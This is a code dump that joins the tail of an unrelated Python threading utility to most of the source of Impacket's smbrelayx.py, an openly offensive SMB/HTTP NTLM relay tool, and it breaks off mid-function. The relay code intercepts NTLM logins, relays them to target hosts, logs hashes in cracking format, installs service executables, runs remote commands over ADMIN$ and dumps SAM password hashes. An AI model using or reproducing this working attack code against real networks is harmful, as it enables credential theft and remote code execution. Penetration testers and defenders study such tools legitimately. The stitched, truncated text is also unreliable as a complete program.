pt(traceback.print_exc())
raise ValueError("STOP")
return json_string
def execute_asynchronous_thread(functions, arguments=None, kwargs=None):
Thread(functions=functions, arguments=arguments, kwargs=kwargs)
class Thread():
"""
"""
def __init__(self, functions, arguments=None, kwargs=None):
datatype = self.__check_type__(functions)
if datatype == type(list()):
pass
else:
self._execute_process(function_def=functions, arguments=arguments, kwargs=kwargs)
def __check_type__(self, object):
return type(object)
def _execute_process(self, function_def, arguments=None, kwargs=None):
if not arguments:
arguments = ()
if type(function_def) == type(str("")):
name = function_def
else:
name = function_def.__name__
process = threading.Thread(name=name, target=function_def, args=arguments, kwargs=kwargs)
process.start()
def class_properties(object, attributes_to_delete=None):
"""
Return a string with actual object features without not necessaries
:param attributes_to_delete: represent witch attributes set must be deleted.
:return: A copy of class.__dic__ without deleted attributes
"""
pt("object", object)
dict_copy = object.__dict__.copy() # Need to be a copy to not get original class' attributes.
return dict_copy
|
smbrelayx.py
|
#!/opt/impacket-impacket_0_9_20/bin/python3
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SMB Relay Module
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc. It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first to try authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the smbclient portion. It is supposed to be
# working on any LM Compatibility level. The only way to stop this attack
# is to enforce on the server SPN checks and or signing.
#
# If the target system is enforcing signing and a machine account was provided,
# the module will try to gather the SMB session key through
# NETLOGON (CVE-2015-0005)
#
# If the authentication against the targets succeed, the client authentication
# success as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want to the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
from __future__ import division
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import http.server
import socketserver
import argparse
import base64
import logging
import os
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from binascii import unhexlify, hexlify
from struct import pack, unpack
from threading import Thread
from six import PY2
from impacket import version
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS
from impacket.examples.ntlmrelayx.clients.smbrelayclient import SMBRelayClient
from impacket.nt_errors import ERROR_MESSAGES
from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \
STATUS_MORE_PROCESSING_REQUIRED
from impacket.ntlm import NTLMAuthChallengeResponse, NTLMAuthNegotiate, NTLMAuthChallenge, AV_PAIRS, \
NTLMSSP_AV_HOSTNAME, generateEncryptedSessionKey
from impacket.smb import NewSMBPacket, SMBCommand, SMB, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Extended_Data, \
SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Extended_Response_Data, \
SMBSessionSetupAndX_Parameters, SMBSessionSetupAndX_Extended_Parameters, TypesMech, \
SMBSessionSetupAndXResponse_Parameters, SMBSessionSetupAndXResponse_Data
from impacket.smb3 import SMB3
from impacket.smbconnection import SMBConnection
from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER
from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit
try:
from Cryptodome.Cipher import DES, AES, ARC4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
logging.critical("See https://pypi.org/project/pycryptodomex/")
# Global Variables
# This is the list of hosts that have been attacked already in case -one-shot was chosen
ATTACKED_HOSTS = set()
CODEC = sys.getdefaultencoding()
class doAttack(Thread):
def __init__(self, SMBClient, exeFile, command):
Thread.__init__(self)
if isinstance(SMBClient, SMB) or isinstance(SMBClient, SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.__exeFile = exeFile
self.__command = command
self.__answerTMP = b''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
global ATTACKED_HOSTS
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
logging.debug('Exception:', exc_info=True)
# Something wen't wrong, most probably we don't have access as admin. aborting
logging.error(str(e))
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
return
try:
if self.__command is not None:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = b''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
logging.debug('Raw answer %r' % self.__answerTMP)
try:
print(self.__answerTMP.decode(CODEC))
except UnicodeDecodeError:
logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html\nand then execute wmiexec.py '
'again with -codec and the corresponding codec')
print(self.__answerTMP)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.debug('Exception:', exc_info=True)
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
try:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.error(str(e))
pass
class SMBClient(SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
neg_sess = SMB.neg_session(self, extended_security = self._extendedSecurity)
return neg_sess
def setUid(self,uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = user
sessionSetup['Data']['PrimaryDomain'] = domain
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
logging.error("Error login_standard")
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
if self.domainIp is None:
logging.error("Signature is REQUIRED on the other end, attack will not work")
else:
logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" % self.domainIp)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'] )
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
logging.debug("Exception:", exc_info=True)
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00',
ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage[
'user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00'*8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except DCERPCException as e:
logging.debug('Exception:', exc_info=True)
logging.error(str(e))
return e.get_error_code()
logging.info("%s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey']
logging.info("SMB Signing key: %s " % hexlify(signingKey))
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
def sendAuth(self, serverChallenge, authenticateMessageBlob):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
smb['Uid'] = self._uid
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob)
sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
errorCode = smb['ErrorCode'] << 16
errorCode += smb['_reserved'] << 8
errorCode += smb['ErrorClass']
if errorCode == STATUS_SUCCESS and self._SignatureRequired is True and self.domainIp is not None:
try:
errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)
except:
logging.debug('Exception:', exc_info=True)
raise
return smb, errorCode
def sendNegotiate(self, negotiateMessage):
smb = NewSMBPacket()
smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY
# Are we required to sign SMB? If so we do it, if not we skip it
if self._SignatureRequired:
smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data()
sessionSetup['Parameters']['MaxBufferSize'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VcNumber'] = 1
sessionSetup['Parameters']['SessionKey'] = 0
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE
# Let's build a NegTokenInit with the NTLMSSP
# TODO: In the future we should be able to choose different providers
blob = SPNEGO_NegTokenInit()
# NTLMSSP
blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
blob['MechToken'] = negotiateMessage
sessionSetup['Parameters']['SecurityBlobLength'] = len(blob)
sessionSetup['Parameters'].getData()
sessionSetup['Data']['SecurityBlob'] = blob.getData()
# Fake Data here, don't want to get us fingerprinted
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except Exception:
logging.error("SessionSetup Error!")
raise
else:
# We will need to use this uid field for all future requests/responses
self._uid = smb['Uid']
# Now we have to extract the blob to continue the auth process
sessionResponse = SMBCommand(smb['Data'][0])
sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters'])
sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2'])
sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength']
sessionData.fromString(sessionResponse['Data'])
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob'])
return respToken['ResponseToken']
class HTTPRelayServer(Thread):
class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, server_address, RequestHandlerClass, target, exeFile, command, mode, outputFile,
one_shot, returnStatus=STATUS_SUCCESS, runSocks = False):
self.target = target
self.exeFile = exeFile
self.command = command
self.mode = mode
self.returnStatus = returnStatus
self.outputFile = outputFile
self.one_shot = one_shot
self.runSocks = runSocks
socketserver.TCPServer.__init__(self,server_address, RequestHandlerClass)
class HTTPHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self,request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
self.challengeMessage = None
self.target = None
self.client = None
self.machineAccount = None
self.machineHashes = None
self.domainIp = None
global ATTACKED_HOSTS
if self.server.target in ATTACKED_HOSTS and self.server.one_shot:
logging.info(
"HTTPD: Received connection from %s, skipping %s, already attacked" % (
client_address[0], self.server.target))
return
if self.server.target is not None:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], self.server.target))
else:
logging.info(
"HTTPD: Received connection from %s, attacking target %s" % (client_address[0], client_address[0]))
http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
def handle_one_request(self):
try:
http.server.SimpleHTTPRequestHandler.handle_one_request(self)
except Exception:
logging.debug("Exception:", exc_info=True)
pass
def log_message(self, format, *args):
return
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_AUTHHEAD(self, message = ''):
self.send_response(401)
self.send_header('WWW-Authenticate', message.decode('utf-8'))
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def send_error(self, code, message=None):
if message.find('RPC_OUT') >=0 or message.find('RPC_IN'):
return self.do_GET()
return http.server.SimpleHTTPRequestHandler.send_error(self,code,message)
def do_GET(self):
messageType = 0
if PY2:
authorizationHeader = self.headers.getheader('Authorization')
else:
authorizationHeader = self.headers.get('Authorization')
if authorizationHeader is None:
self.do_AUTHHEAD(message = b'NTLM')
pass
else:
#self.do_AUTHHEAD()
typeX = authorizationHeader
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if self.server.mode.upper() == 'REFLECTION':
self.target = self.client_address[0]
else:
self.target = self.server.target
try:
if self.client is not None:
logging.error('Still performing an attack against %s' % self.client.get_remote_host())
self.send_response(404)
self.end_headers()
return
self.client = SMBClient(self.target, extended_security = True)
self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
self.client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
clientChallengeMessage = self.client.sendNegotiate(token)
self.challengeMessage = NTLMAuthChallenge()
self.challengeMessage.fromString(clientChallengeMessage)
self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '' or self.target == '127.0.0.1':
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = token
clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'],
respToken2.getData())
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials, except
# when coming from localhost
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
logging.error("Authenticating against %s as %s\\%s FAILED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
self.do_AUTHHEAD('NTLM')
else:
# Relay worked, do whatever we want here...
logging.info("Authenticating against %s as %s\\%s SUCCEED" % (
self.target, authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le')))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.outputFile)
# Target will be attacked, adding to the attacked set
# If the attack fails, the doAttack thread will be responsible of removing it from the set
global ATTACKED_HOSTS
if self.target not in ATTACKED_HOSTS:
ATTACKED_HOSTS.add(self.target)
if self.server.runSocks is True:
# Pass all the data to the socksplugins proxy
protocolClient = SMBRelayClient(None,urlparse('smb://%s' % self.target))
protocolClient.session = SMBConnection(existingConnection=self.client)
activeConnections.put(
(self.target, 445, 'SMB', ('%s/%s' % (
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper(),
protocolClient,
{'CHALLENGE_MESSAGE': self.challengeMessage}))
logging.info("Adding %s(445) to active SOCKS connection. Enjoy" % self.target)
else:
clientThread = doAttack(self.client,self.server.exeFile,self.server.command)
self.client = None
clientThread.start()
else:
logging.error('%s is being attacker at the moment, skipping.. ' % self.target)
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
return
def __init__(self, outputFile=None):
Thread.__init__(self)
self.daemon = True
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.command = None
self.target = None
self.mode = None
self.outputFile = outputFile
self.one_shot = False
self.runSocks = False
def setTargets(self, target):
self.target = target
def setExeFile(self, filename):
self.exeFile = filename
def setCommand(self, command):
self.command = command
def setSocks(self, socks):
self.runSocks = socks
def setReturnStatus(self, returnStatus):
# Not implemented yet.
pass
def setMode(self,mode, one_shot):
self.mode = mode
self.one_shot = one_shot
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
def run(self):
logging.info("Setting up HTTP Server")
httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.command, self.mode,
self.outputFile, self.one_shot, runSocks = self.runSocks)
httpd.serve_forever()
class SMBRelayServer(Thread):
def __init__(self, outputFile = None):
Thread.__init__(self)
self.daemon = True
self.server = 0
self.target = ''
self.mode = 'REFLECTION'
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
self.exeFile = None
self.returnStatus = STATUS_SUCCESS
self.command = None
self.one_shot = False
self.runSocks = False
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if outputFile is not None:
smbConfig.set('global','jtr_dump_path',outputFile)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(SMB.SMB_COM_SESSION_SETUP_ANDX,
self.SmbSessionSetupAndX)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
self.server.addConnection('SMBRelay', '0.0.0.0', 445)
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
if self.mode.upper() == 'REFLECTION':
self.target = connData['ClientIP']
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
if self.target in smbData:
# Remove the previous connection and use the last one
smbClient = smbData[self.target]['SMBClient']
del smbClient
del smbData[self.target]
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
else:
logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
try:
if recvPacket['Flags2'] & SMB.FLAGS2_EXTENDED_SECURITY == 0:
extSec = False
else:
if self.mode.upper() == 'REFLECTION':
# Force standard security when doing reflection
logging.info("Downgrading to standard security")
extSec = False
recvPacket['Flags2'] += (~SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
client = SMBClient(self.target, extended_security = extSec)
client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
client.set_timeout(60)
except Exception as e:
logging.error("Connection against target %s FAILED" % self.target)
logging.error(str(e))
else:
encryptionKey = client.get_encryption_key()
smbData[self.target] = {}
smbData[self.target]['SMBClient'] = client
if encryptionKey is not None:
connData['EncryptionKey'] = encryptionKey
smbServer.setConnectionData('SMBRelay', smbData)
smbServer.setConnectionData(connId, connData)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
#############################################################
def SmbSessionSetupAndX(self, connId, smbServer, smbCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
global ATTACKED_HOSTS
if connData['_dialects_parameters']['Capabilities'] & SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = SMBSessionSetupAndX_Extended_Response_Parameters()
respData = SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = SMBSessionSetupAndX_Extended_Parameters(smbCommand['Parameters'])
sessionSetupData = SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(smbCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if unpack('B',sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
# Let's check if we already attacked this host.
global ATTACKED_HOSTS
if self.target in ATTACKED_HOSTS and self.one_shot is True:
logging.info("SMBD: Received connection from %s, skipping %s, already attacked" % (
connData['ClientIP'], self.target))
packet = NewSMBPacket()
packet['Flags1'] = SMB.FLAGS1_REPLY
packet['Flags2'] = SMB.FLAGS2_NT_STATUS
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
errorCode = STATUS_NOT_SUPPORTED
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
return None, [packet], STATUS_NOT_SUPPORTED
# It might happen if the target connects back before a previous connection has finished, we might
# get to this function w/o having the dict and smbClient entry created, because a
# NEGOTIATE_CONNECTION was not needed
if (self.target in smbData) is False:
smbData[self.target] = {}
smbClient = SMBClient(self.target)
smbClient.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
smbClient.set_timeout(60)
smbData[self.target]['SMBClient'] = smbClient
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
